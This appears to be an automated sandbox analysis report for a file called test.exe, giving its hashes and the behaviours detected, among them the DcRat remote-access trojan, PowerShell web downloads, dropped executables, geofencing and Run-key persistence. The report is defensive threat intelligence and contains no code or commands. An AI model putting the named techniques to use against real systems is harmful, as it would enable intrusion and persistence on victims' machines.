General

  • Target

    test.exe

  • Size

    154KB

  • Sample

    240622-rsp7ws1fpg

  • MD5

    888cffc8e5f72b2a4ea416b028af87c9

  • SHA1

    eb520fc0c91d329f98568452fff0dd985c37556a

  • SHA256

    3d0ddd3c8dccf9b68e2fb3d751e555f2b92e84d89d04caaf6b819439e8147431

  • SHA512

    365ffd1a32cc7ae193bf298d79af35ef2c5e567630e34783b490902fd744f24a43a1fa0f5d89f18f96d88ec23eef30aaab363d9563fb91bf316264ee02bcf89e

  • SSDEEP

    3072:uahKyd2n31J5GWp1icKAArDZz4N9GhbkrNEk1hT:uahOlp0yN90QEq

Malware Config

Targets

    • Target

      test.exe

    • Size

      154KB

    • MD5

      888cffc8e5f72b2a4ea416b028af87c9

    • SHA1

      eb520fc0c91d329f98568452fff0dd985c37556a

    • SHA256

      3d0ddd3c8dccf9b68e2fb3d751e555f2b92e84d89d04caaf6b819439e8147431

    • SHA512

      365ffd1a32cc7ae193bf298d79af35ef2c5e567630e34783b490902fd744f24a43a1fa0f5d89f18f96d88ec23eef30aaab363d9563fb91bf316264ee02bcf89e

    • SSDEEP

      3072:uahKyd2n31J5GWp1icKAArDZz4N9GhbkrNEk1hT:uahOlp0yN90QEq

    • DcRat

      DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • DCRat payload

      Detects payload of DCRat, commonly dropped by NSIS installers.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Adds Run key to start application

MITRE ATT&CK Enterprise v15

Tasks